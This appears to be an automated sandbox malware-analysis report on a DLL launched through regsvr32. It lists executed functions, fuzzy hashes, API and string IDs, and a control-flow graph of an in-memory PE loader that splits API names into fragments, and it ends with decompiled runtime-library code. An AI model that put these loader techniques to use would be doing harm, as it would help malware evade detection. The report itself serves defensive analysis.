17407->17408 17412 7ffa5247bb0e _LocaleUpdate::~_LocaleUpdate 17408->17412 17409 7ffa5247cc93 17411 7ffa5246bd70 _invalid_parameter 17 API calls 17409->17411 17409->17412 17410->17409 17413 7ffa5247bada 17410->17413 17411->17412 17414 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17412->17414 17416 7ffa5246bd70 _invalid_parameter 17 API calls 17413->17416 17415 7ffa5247cd90 17414->17415 17416->17412 17417 7ffa52471b64 17418 7ffa52471b9d 17417->17418 17419 7ffa52471c86 17418->17419 17420 7ffa5247ab10 17 API calls 17418->17420 17421 7ffa52471bed 17418->17421 17419->17421 17422 7ffa52479290 23 API calls 17419->17422 17420->17419 17422->17421

                                                                                Executed Functions

                                                                                Function 00007FFA524612B0 Relevance: 210.9, APIs: 6, Strings: 114, Instructions: 872memorywindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AllocAllocateBoundaryDeleteDescriptorExitHeapLibraryLoadMessageProcessVirtual
                                                                                • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                                                • API String ID: 3056597726-2032897877
                                                                                • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                • Instruction ID: e77127591a7461ebb14c7dace4d55e73a23bdc28c442d7348f3eabf117fd809e
                                                                                • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                • Instruction Fuzzy Hash: 7CE2C8B690A7C18FE3748F62AA917DD3AB0F346748F509208D3991FA1DCB795242CF85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00950000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 15 950000-950460 call 950aa8 * 2 VirtualAlloc 37 950462-950466 15->37 38 95048a-950494 15->38 39 950468-950488 37->39 41 950a91-950aa6 38->41 42 95049a-95049e 38->42 39->38 39->39 42->41 43 9504a4-9504a8 42->43 43->41 44 9504ae-9504b2 43->44 44->41 45 9504b8-9504bf 44->45 45->41 46 9504c5-9504d2 45->46 46->41 47 9504d8-9504e1 46->47 47->41 48 9504e7-9504f4 47->48 48->41 49 9504fa-950507 48->49 50 950531-950567 GetNativeSystemInfo 49->50 51 950509-950511 49->51 50->41 53 95056d-950589 VirtualAlloc 50->53 52 950513-950518 51->52 54 950521 52->54 55 95051a-95051f 52->55 56 9505a0-9505ac 53->56 57 95058b-95059e 53->57 58 950523-95052f 54->58 55->58 59 9505af-9505b2 56->59 57->56 58->50 58->52 60 9505b4-9505bf 59->60 61 9505c1-9505db 59->61 60->59 63 9505dd-9505e2 61->63 64 95061b-950622 61->64 65 9505e4-9505ea 63->65 66 950628-95062f 64->66 67 9506db-9506e2 64->67 68 9505ec-950609 65->68 69 95060b-950619 65->69 66->67 70 950635-950642 66->70 71 950864-95086b 67->71 72 9506e8-9506f9 67->72 68->68 68->69 69->64 69->65 70->67 75 950648-95064f 70->75 73 950917-950929 71->73 74 950871-95087f 71->74 76 950702-950705 72->76 77 950a07-950a1a 73->77 78 95092f-950937 73->78 79 95090e-950911 74->79 80 950654-950658 75->80 81 950707-95070a 76->81 82 9506fb-9506ff 76->82 95 950a40-950a4a 77->95 96 950a1c-950a27 77->96 84 95093b-95093f 78->84 79->73 83 950884-9508a9 79->83 85 9506c0-9506ca 80->85 86 95070c-95071d 81->86 87 950788-95078e 81->87 82->76 112 950907-95090c 83->112 113 9508ab-9508b1 83->113 91 950945-95095a 84->91 92 9509ec-9509fa 84->92 89 9506cc-9506d2 85->89 90 95065a-950669 85->90 88 950794-9507a2 86->88 93 95071f-950720 86->93 87->88 97 95085d-95085e 88->97 98 9507a8 88->98 89->80 99 9506d4-9506d5 89->99 103 95066b-950678 90->103 104 95067a-95067e 90->104 101 95095c-95095e 91->101 102 95097b-95097d 91->102 92->84 105 950a00-950a01 92->105 106 950722-950784 93->106 110 950a4c-950a54 95->110 111 950a7b-950a8e 95->111 108 950a38-950a3e 96->108 97->71 109 9507ae-9507d4 98->109 99->67 114 950960-95096c 101->114 115 95096e-950979 101->115 117 9509a2-9509a4 102->117 118 95097f-950981 102->118 116 9506bd-9506be 103->116 119 950680-95068a 104->119 120 95068c-950690 104->120 105->77 106->106 107 950786 106->107 107->88 108->95 121 950a29-950a35 108->121 142 950835-950839 109->142 143 9507d6-9507d9 109->143 110->111 122 950a56-950a79 RtlAddFunctionTable 110->122 111->41 112->79 131 9508b3-9508b9 113->131 132 9508bb-9508c8 113->132 123 9509be-9509bf 114->123 115->123 116->85 129 9509a6-9509aa 117->129 130 9509ac-9509bb 117->130 124 950983-950987 118->124 125 950989-95098b 118->125 126 9506b6-9506ba 119->126 127 9506a5-9506a9 120->127 128 950692-9506a3 120->128 121->108 122->111 137 9509c5-9509cb 123->137 124->123 125->117 135 95098d-95098f 125->135 126->116 127->116 136 9506ab-9506b3 127->136 128->126 129->123 130->123 138 9508ea-9508fe 131->138 139 9508d3-9508e5 132->139 140 9508ca-9508d1 132->140 144 950991-950997 135->144 145 950999-9509a0 135->145 136->126 146 9509cd-9509d3 137->146 147 9509d9-9509e9 VirtualProtect 137->147 138->112 153 950900-950905 138->153 139->138 140->139 140->140 151 950844-950850 142->151 152 95083b 142->152 149 9507e3-9507f0 143->149 150 9507db-9507e1 143->150 144->123 145->137 146->147 147->92 155 9507f2-9507f9 149->155 156 9507fb-95080d 149->156 154 950812-95082c 150->154 151->109 157 950856-950857 151->157 152->151 153->113 154->142 159 95082e-950833 154->159 155->155 155->156 156->154 157->97 159->143
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.475983111.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_950000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                • API String ID: 394283112-2517549848
                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction ID: 0591526eaa0f0d6c926ca358d636f41cf91e6602b8fce56eca9d4ce1cca58f1a
                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction Fuzzy Hash: 6772D330618B488FDB29DF19C8856B9B7E1FB98305F14462DECCAC7211EB34E946CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52468860 Relevance: 4.5, APIs: 3, Instructions: 25memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FFA524633C2), ref: 00007FFA52468876
                                                                                • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA524633C2), ref: 00007FFA52468891
                                                                                • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA524633C2), ref: 00007FFA524688BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CreateInformationVersion
                                                                                • String ID:
                                                                                • API String ID: 3563531100-0
                                                                                • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                • Instruction ID: fe635b942acff2b588f422a7f2664b4f03797a85762d977ea68a8b8f9db58e1f
                                                                                • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                • Instruction Fuzzy Hash: B3F05E75A28A8292F714E710EC0937923F0BF5A344F94C434D55D826A8DEBDE58DC700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52467DE0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 109COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                                                • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                                                • API String ID: 1648969265-681193798
                                                                                • Opcode ID: 20ee21bbe844799f031897518e202e5835f501dc7c4be053d2fd605d6d6bfd94
                                                                                • Instruction ID: e2fe3f1adea1f0a850a00d46cd20bf3a93adc9fc5aa303b110d5d6ab92585996
                                                                                • Opcode Fuzzy Hash: 20ee21bbe844799f031897518e202e5835f501dc7c4be053d2fd605d6d6bfd94
                                                                                • Instruction Fuzzy Hash: 48516F32A2DB8195E750CB14E88072A77F0FB86B44F548135E69E87B9DCFBDE4458B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52468670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                                                • API String ID: 1823725401-2473407871
                                                                                • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                • Instruction ID: ed156997b772b55426b6cde6189a1cb3ec5e6819e33946636e739e69bfa9a676
                                                                                • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                • Instruction Fuzzy Hash: 4A41C732618B8586E750CF56F84432BB7F1FB8AB94F244025EA8D47B68DFBDE4448B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52463D30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00007FFA52467540: _initp_misc_winsig.LIBCMTD ref: 00007FFA5246757B
                                                                                  • Part of subcall function 00007FFA52467540: _initp_eh_hooks.LIBCMTD ref: 00007FFA52467585
                                                                                  • Part of subcall function 00007FFA52468FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFA5246906F
                                                                                • FlsAlloc.KERNEL32 ref: 00007FFA52463D55
                                                                                  • Part of subcall function 00007FFA52463E00: FlsFree.KERNEL32 ref: 00007FFA52463E13
                                                                                  • Part of subcall function 00007FFA52463E00: _mtdeletelocks.LIBCMTD ref: 00007FFA52463E23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                                                • API String ID: 3828364660-3898981997
                                                                                • Opcode ID: 3ed59da3ba66a1ca0ac497d939f2d07eba5cdbe6c68421ccf927512665642bdb
                                                                                • Instruction ID: 4da9770a164dc8c14e837780febecea0d83090f9dd9f049735d872a85525c5c9
                                                                                • Opcode Fuzzy Hash: 3ed59da3ba66a1ca0ac497d939f2d07eba5cdbe6c68421ccf927512665642bdb
                                                                                • Instruction Fuzzy Hash: 6111547093C68296F754AB64EC453792AF1BF87B50F18C631E56E426DDDFACF4048A10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246F570 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 16%
                                                                                			E00007FFA7FFA5246F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				signed int _v48;
				int _v52;
				int _v56;
				signed int _v64;
				long long _v72;
				void* _t53;
				long long _t82;

				_a32 = r9d;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_v56 = 0;
				if (_a48 != 0) goto 0x5246f5ab;
				_a48 =  *((intOrPtr*)( *_a8 + 4));
				if (_a64 == 0) goto 0x5246f5bf;
				_v32 = 9;
				goto 0x5246f5c7;
				_v32 = 1;
				_v64 = 0;
				_v72 = 0;
				r9d = _a32;
				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v48 != 0) goto 0x5246f60b;
				goto 0x5246f6f8;
				if (0 != 0) goto 0x5246f652;
				if (_v48 <= 0) goto 0x5246f652;
				if (_v48 - 0xfffffff0 > 0) goto 0x5246f652;
				_t82 = _v48 + _v48 + 0x10;
				_t53 = malloc(??); // executed
				E00007FFA7FFA5246F3B0(_t53, 0xdddd, _t82);
				_v24 = _t82;
				goto 0x5246f65b;
				_v24 = 0;
				_v40 = _v24;
				if (_v40 != 0) goto 0x5246f674;
				goto 0x5246f6f8;
				E00007FFA7FFA524632B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
				_v64 = _v48;
				_v72 = _v40;
				r9d = _a32;
				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v52 == 0) goto 0x5246f6ea;
				r8d = _v52;
				_v56 = GetStringTypeW(??, ??, ??, ??);
				E00007FFA7FFA5246F3E0(_v40);
				return _v56;
			}













                                                                                0x7ffa5246f570
                                                                                0x7ffa5246f575
                                                                                0x7ffa5246f57a
                                                                                0x7ffa5246f57e
                                                                                0x7ffa5246f587
                                                                                0x7ffa5246f597
                                                                                0x7ffa5246f5a4
                                                                                0x7ffa5246f5b3
                                                                                0x7ffa5246f5b5
                                                                                0x7ffa5246f5bd
                                                                                0x7ffa5246f5bf
                                                                                0x7ffa5246f5c7
                                                                                0x7ffa5246f5cf
                                                                                0x7ffa5246f5d8
                                                                                0x7ffa5246f5f9
                                                                                0x7ffa5246f602
                                                                                0x7ffa5246f606
                                                                                0x7ffa5246f60f
                                                                                0x7ffa5246f616
                                                                                0x7ffa5246f62a
                                                                                0x7ffa5246f631
                                                                                0x7ffa5246f639
                                                                                0x7ffa5246f646
                                                                                0x7ffa5246f64b
                                                                                0x7ffa5246f650
                                                                                0x7ffa5246f652
                                                                                0x7ffa5246f660
                                                                                0x7ffa5246f66b
                                                                                0x7ffa5246f66f
                                                                                0x7ffa5246f686
                                                                                0x7ffa5246f68f
                                                                                0x7ffa5246f698
                                                                                0x7ffa5246f69d
                                                                                0x7ffa5246f6bf
                                                                                0x7ffa5246f6c8
                                                                                0x7ffa5246f6d2
                                                                                0x7ffa5246f6e6
                                                                                0x7ffa5246f6ef
                                                                                0x7ffa5246f6fc

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                                                • String ID:
                                                                                • API String ID: 2618398691-0
                                                                                • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                • Instruction ID: e10d01b7e00c09cd5deeda2b9ff5ce02b456a1ab92866fb5b53ccd20b5591cba
                                                                                • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                • Instruction Fuzzy Hash: FD41083251C6818AD760DB15E48436AB7F0F786B94F148135EADE47BA8DFBCE8858F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52468040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName__initmbctable
                                                                                • String ID: C:\Windows\system32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                                                • API String ID: 3548084100-462439500
                                                                                • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                • Instruction ID: 4dcc2292c810e8429a38437f981221ec8383db6a91aa33b4437f2148f400cc78
                                                                                • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                • Instruction Fuzzy Hash: 27410121629A4591EA50DB14EC8037A77F0FB867A4F548736E6AE43BE8DFBDE144C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246A5E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 23%
                                                                                			E00007FFA7FFA5246A5E0(long long __rcx, void* _a8) {
				signed int _v24;
				char _v42;
				void* _v48;
				signed int _v56;
				char _v312;
				signed char* _v328;
				char _v584;
				char _v840;
				char _v1352;
				char _v1384;
				char _v1392;
				intOrPtr _v1400;
				long long _v1408;
				long long _v1416;
				signed long long _t206;
				signed char* _t214;
				signed long long _t223;
				intOrPtr _t225;
				intOrPtr _t226;
				signed long long _t233;

				_t224 = __rcx;
				_a8 = __rcx;
				_t206 =  *0x5248b018; // 0x6ebca90f5d98
				_v24 = _t206 ^ _t233;
				if (GetCPInfo(??, ??) == 0) goto 0x5246a906;
				_v56 = 0;
				goto 0x5246a63c;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0x5246a661;
				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
				goto 0x5246a62c;
				_v312 = 0x20;
				_v328 =  &_v42;
				goto 0x5246a68f;
				_v328 =  &(_v328[2]);
				if (( *_v328 & 0x000000ff) == 0) goto 0x5246a6ea;
				_v56 =  *_v328 & 0x000000ff;
				goto 0x5246a6c2;
				_v56 = _v56 + 1;
				_t214 = _v328;
				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0x5246a6e8;
				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
				goto 0x5246a6b2;
				goto 0x5246a67b;
				_v1392 = 0;
				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
				_v1408 =  *((intOrPtr*)(_a8 + 4));
				_v1416 =  &_v1352;
				r9d = 0x100;
				E00007FFA7FFA5246F4D0(1,  &_v1352, __rcx,  &_v312); // executed
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v840;
				_v1416 = 0x100;
				r8d = 0x100;
				E00007FFA7FFA5246EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v584;
				_v1416 = 0x100;
				r8d = 0x200;
				_t223 = _a8;
				E00007FFA7FFA5246EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
				_v56 = 0;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0x5246a901;
				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0x5246a879;
				_t225 = _a8;
				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
				goto 0x5246a8fc;
				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0x5246a8e5;
				_t226 = _a8;
				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
				goto 0x5246a8fc;
				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
				goto L1;
				goto 0x5246aa20;
				_v56 = 0;
				_v56 = _v56 + 1;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0x5246aa20;
				if (_v56 - 0x41 < 0) goto 0x5246a99c;
				if (_v56 - 0x5a > 0) goto 0x5246a99c;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
				_v56 = _v56 + 1;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 + 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
				goto 0x5246aa1b;
				if (_v56 - 0x61 < 0) goto 0x5246aa04;
				if (_v56 - 0x7a > 0) goto 0x5246aa04;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
				_v56 = _v56 + 1;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 - 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
				goto 0x5246aa1b;
				__eax = _v56;
				__rcx = _a8;
				 *((char*)(_a8 + __rax + 0x11d)) = 0;
				goto L2;
				__rcx = _v24;
				__rcx = _v24 ^ __rsp;
				return E00007FFA7FFA52463280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
			}























                                                                                0x7ffa5246a5e0
                                                                                0x7ffa5246a5e0
                                                                                0x7ffa5246a5ec
                                                                                0x7ffa5246a5f6
                                                                                0x7ffa5246a619
                                                                                0x7ffa5246a61f
                                                                                0x7ffa5246a62a
                                                                                0x7ffa5246a635
                                                                                0x7ffa5246a647
                                                                                0x7ffa5246a658
                                                                                0x7ffa5246a65f
                                                                                0x7ffa5246a661
                                                                                0x7ffa5246a671
                                                                                0x7ffa5246a679
                                                                                0x7ffa5246a687
                                                                                0x7ffa5246a69c
                                                                                0x7ffa5246a6a9
                                                                                0x7ffa5246a6b0
                                                                                0x7ffa5246a6bb
                                                                                0x7ffa5246a6c2
                                                                                0x7ffa5246a6d5
                                                                                0x7ffa5246a6de
                                                                                0x7ffa5246a6e6
                                                                                0x7ffa5246a6e8
                                                                                0x7ffa5246a6ea
                                                                                0x7ffa5246a6fd
                                                                                0x7ffa5246a70c
                                                                                0x7ffa5246a715
                                                                                0x7ffa5246a71a
                                                                                0x7ffa5246a72f
                                                                                0x7ffa5246a734
                                                                                0x7ffa5246a747
                                                                                0x7ffa5246a74b
                                                                                0x7ffa5246a75b
                                                                                0x7ffa5246a760
                                                                                0x7ffa5246a770
                                                                                0x7ffa5246a783
                                                                                0x7ffa5246a788
                                                                                0x7ffa5246a79b
                                                                                0x7ffa5246a79f
